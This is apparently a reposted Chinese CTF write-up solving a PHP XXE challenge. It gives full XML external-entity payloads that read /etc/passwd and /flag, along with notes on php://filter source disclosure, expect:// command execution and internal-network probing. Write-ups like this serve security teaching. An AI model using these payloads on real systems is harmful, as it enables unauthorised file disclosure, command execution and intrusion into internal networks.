当前位置: 首页 > news >正文

4、PHP的xml注入漏洞(xxe)

news 2025/7/18 13:39:43

青少年ctf:PHP的XXE

1、打开网页是一个PHP版本页面

2、CTRL+f搜索xml,发现2.8.0版本,含有xml漏洞

3、bp抓包

4、使用代码出发bug

GET /simplexml_load_string.php HTTP/1.1

补充:

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<name>&xxe;</name>
</root>/* 
1.读取任意文件
file 协议,file:///etc//passwd
php 协议,php://filter/read=convert.base64-encode/resource=index.php
2.执行系统命令
PHP环境中PHP的expect模块被加载
expect://ipconfig
3.内网探测
http://192.168.0.128:80
参见:https://xz.aliyun.com/t/3357#toc-11
*/

5、在触发bug的包下面加上,获取flag

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///flag" >]>
<root>
<name>&xxe;</name>
</root>

6、查看其他文件etc/passwd

拓展内容:一篇文章带你深入理解漏洞之 XXE 漏洞 - 先知社区

http://www.lryc.cn/news/355458.html

相关文章:

  • 设计模式-解释器模式
  • NDIS驱动程序堆栈
  • 大数据开发面试题【数仓篇】
  • Leetcode刷题笔记5
  • 【Qt】Qt中的信号槽
  • VsCode个人插件
  • Docker环境安装并使用Elasticsearch
  • 中心渗透Ⅱ
  • 【webrtc】RtpToNtpEstimator:最小二乘法、ntp估计及c++实例
  • 【DevOps】Elasticsearch在Ubuntu 20.04上的安装与配置:详细指南
  • windows内存管理
  • c++ 将指针转换为 void* 后,转换为怎么判断原指针类型?
  • Swift 属性
  • 基于maxkey接入jeecgboot并实现账户同步
  • kafka Kerberos集群环境部署验证
  • [C++]debug介绍+debug时如何查看指针指向内存处的值
  • AI学习指南数学工具篇-凸优化在支持逻辑回归中的应用
  • Flutter 中的 AspectRatio 小部件:全面指南
  • 应用程序中的会话管理和Cookie安全指南
  • 备战秋招c++ 【持续更新】
  • 整数拆分~
  • 【Qt Creator】跨平台的C++图形用户界面应用程序开发框架---QT
  • KingbaseES数据库物理备份还原sys_rman
  • 【CV】视频图像背景分割MOG2,KNN,GMG
  • 使用 Python 简单几步去除 PDF 水印
  • 【香橙派 AIpro】OrangePi AIpro :教育、机器人、无人机领域的超级AI大脑,华为昇腾处理器驱动的AI开发板新标杆
  • 【Mac】 CleanMyMac X for mac V4.15.2中文修复版安装教程
  • 单片机通信协议(1):SPI简介
  • 免税商品优选购物商城,基于 SpringBoot+Vue+MySQL 开发的前后端分离的免税商品优选购物商城设计实现
  • 京准电子、NTP电子时钟系统(网络时钟系统)概述